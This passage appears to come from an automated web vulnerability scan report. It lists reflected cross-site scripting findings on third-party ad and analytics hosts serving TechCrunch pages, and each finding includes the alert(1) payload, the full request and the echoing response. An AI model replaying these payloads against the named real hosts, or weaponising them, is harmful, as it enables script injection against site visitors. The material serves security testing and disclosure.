Confidence:   Certain
Host:   http://api.postup.com
Path:   /TCTUL001/twidget/1.jsonp

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload a5385<script>alert(1)</script>1a4bb3f8d71 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TCTUL001/twidget/1.jsonp?jsonp=jsonp1298773825717a5385<script>alert(1)</script>1a4bb3f8d71&numAuthors=7&numPosts=0&bf=tech&uip=&ua=&ref=http%3A%2F%2Ftechcrunch.com%2F2011%2F02%2F16%2Fforbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links%2F&qh=TechCrunch&format=300x600 HTTP/1.1
Host: api.postup.com
Proxy-Connection: keep-alive
Referer: http://www.tweetup.com/twidget/twidget.2.300x600.html?partner=TCTUL001&keyword=TechCrunch&backfill=tech&refurl=http://techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 27 Feb 2011 02:32:03 GMT
Content-Type: text/javascript; charset=UTF-8
Connection: keep-alive
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: bc=9CE434E0-6353-4F68-9196-9FD9DBD5DD9E;Path=/;Expires=Wed, 24-Feb-21 02:32:03 GMT
Set-Cookie: sc=6148C463-8CE9-4536-981B-E1A093F9C2BB;Path=/
Set-Cookie: bp=NR6mPz0SXEsXB_t8NNHvEsKZO0M;Path=/
CP: NON DSP CURa ADMa DEVa TAIa IVAa IVDa OUR BUS IND UNI COM NAV INT CNT
Content-Length: 19542

jsonp1298773825717a5385<script>alert(1)</script>1a4bb3f8d71({"users":[{"created_at":"Wed May 19 20:08:01 PDT 2010","description":"News and opinions on technology, internet \u0026 media. Focused on investors, companies and products impacting social and commerci
...[SNIP]...
3.11. http://apps.conduit-banners.com/TechCrunchApp-Techcrunch_APP [imageurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apps.conduit-banners.com
Path:   /TechCrunchApp-Techcrunch_APP

Issue detail

The value of the imageurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 365ee'%3balert(1)//b377350152c was submitted in the imageurl parameter. This input was echoed as 365ee';alert(1)//b377350152c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TechCrunchApp-Techcrunch_APP?appid=0b9c9103-d379-409d-9edb-54745461fe64&script=togo&type=1&imageurl=http://s2.wp.com/wp-content/themes/vip/tctechcrunch/images/conduit.gif365ee'%3balert(1)//b377350152c&supportedonly=1 HTTP/1.1
Host: apps.conduit-banners.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 27 Feb 2011 03:31:08 GMT
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 4674

function imgToGoOnLoad__806157278(imgObj) {var elm = imgObj,func__806157278 = function(){
SharedItems.Togo.Manager.createItem('0b9c9103-d379-409d-9edb-54745461fe64','','2523688','TechCrunch-App'
...[SNIP]...
<img style="cursor: pointer; visibility: visible;" src="http://s2.wp.com/wp-content/themes/vip/tctechcrunch/images/conduit.gif365ee';alert(1)//b377350152c" title="Grab an app for your browser" alt="Techcrunch News" border="0" onload="imgToGoOnLoad__806157278(this);" >
...[SNIP]...
3.12. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 76688<script>alert(1)</script>2d0cdbe6589 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=876688<script>alert(1)</script>2d0cdbe6589&c2=2113&c3=20&c4=4837&c5=28380&c6=&c10=175955&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Mar 2011 16:44:51 GMT
Date: Sun, 27 Feb 2011 16:44:51 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"876688<script>alert(1)</script>2d0cdbe6589", c2:"2113", c3:"20", c4:"4837", c5:"28380", c6:"", c10:"175955", c15:"", c16:"", r:""});
3.13. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload a70f0<script>alert(1)</script>5846377f9ec was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=28380&c6=&c10=175955a70f0<script>alert(1)</script>5846377f9ec&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Mar 2011 16:45:02 GMT
Date: Sun, 27 Feb 2011 16:45:02 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"28380", c6:"", c10:"175955a70f0<script>alert(1)</script>5846377f9ec", c15:"", c16:"", r:""});
3.14. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 4dfb7<script>alert(1)</script>028085d548b was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=28380&c6=&c10=175955&c15=4dfb7<script>alert(1)</script>028085d548b HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Mar 2011 16:45:02 GMT
Date: Sun, 27 Feb 2011 16:45:02 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"28380", c6:"", c10:"175955", c15:"4dfb7<script>alert(1)</script>028085d548b", c16:"", r:""});
3.15. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload bc9c3<script>alert(1)</script>3733a91cc15 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113bc9c3<script>alert(1)</script>3733a91cc15&c3=20&c4=4837&c5=28380&c6=&c10=175955&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Mar 2011 16:44:52 GMT
Date: Sun, 27 Feb 2011 16:44:52 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
e=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"2113bc9c3<script>alert(1)</script>3733a91cc15", c3:"20", c4:"4837", c5:"28380", c6:"", c10:"175955", c15:"", c16:"", r:""});
3.16. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload aecfe<script>alert(1)</script>494c6cd0f61 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=20aecfe<script>alert(1)</script>494c6cd0f61&c4=4837&c5=28380&c6=&c10=175955&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Mar 2011 16:44:53 GMT
Date: Sun, 27 Feb 2011 16:44:53 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
n(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"2113", c3:"20aecfe<script>alert(1)</script>494c6cd0f61", c4:"4837", c5:"28380", c6:"", c10:"175955", c15:"", c16:"", r:""});
3.17. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 8fcd2<script>alert(1)</script>164c2634538 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=20&c4=48378fcd2<script>alert(1)</script>164c2634538&c5=28380&c6=&c10=175955&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Mar 2011 16:44:59 GMT
Date: Sun, 27 Feb 2011 16:44:59 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
r c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"48378fcd2<script>alert(1)</script>164c2634538", c5:"28380", c6:"", c10:"175955", c15:"", c16:"", r:""});
3.18. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 6569b<script>alert(1)</script>98b62b0333a was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=283806569b<script>alert(1)</script>98b62b0333a&c6=&c10=175955&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Mar 2011 16:45:00 GMT
Date: Sun, 27 Feb 2011 16:45:00 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"283806569b<script>alert(1)</script>98b62b0333a", c6:"", c10:"175955", c15:"", c16:"", r:""});
3.19. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload ed016<script>alert(1)</script>37dd9a94977 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=28380&c6=ed016<script>alert(1)</script>37dd9a94977&c10=175955&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Mar 2011 16:45:01 GMT
Date: Sun, 27 Feb 2011 16:45:01 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
mscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"28380", c6:"ed016<script>alert(1)</script>37dd9a94977", c10:"175955", c15:"", c16:"", r:""});
3.20. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [BnId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Issue detail

The value of the BnId request parameter is copied into the HTML document as plain text between tags. The payload d23ea<img%20src%3da%20onerror%3dalert(1)>11242cb47aa was submitted in the BnId parameter. This input was echoed as d23ea<img src=a onerror=alert(1)>11242cb47aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=d23ea<img%20src%3da%20onerror%3dalert(1)>11242cb47aa HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:45:07 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56347


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
get","fif":"aol"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=d23ea<img src=a onerror=alert(1)>11242cb47aa"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandler.initializationParams["fif"];
if(fifMode && WIDGETBOX.platform.FriendlyIFrame){

...[SNIP]...
3.21. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 10]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Issue detail

The value of REST URL parameter 10 is copied into the HTML document as plain text between tags. The payload 94f39<img%20src%3da%20onerror%3dalert(1)>6a768a93c3 was submitted in the REST URL parameter 10. This input was echoed as 94f39<img src=a onerror=alert(1)>6a768a93c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink94f39<img%20src%3da%20onerror%3dalert(1)>6a768a93c3/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:46:26 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56525


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
75-95ef3e434575","platform":"InsertWidget","fif":"aol"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com/adlink94f39<img src=a onerror=alert(1)>6a768a93c3/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;no
...[SNIP]...
3.22. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 11]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Issue detail

The value of REST URL parameter 11 is copied into the HTML document as plain text between tags. The payload 5bcaa<img%20src%3da%20onerror%3dalert(1)>df3967d3b03 was submitted in the REST URL parameter 11. This input was echoed as 5bcaa<img src=a onerror=alert(1)>df3967d3b03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

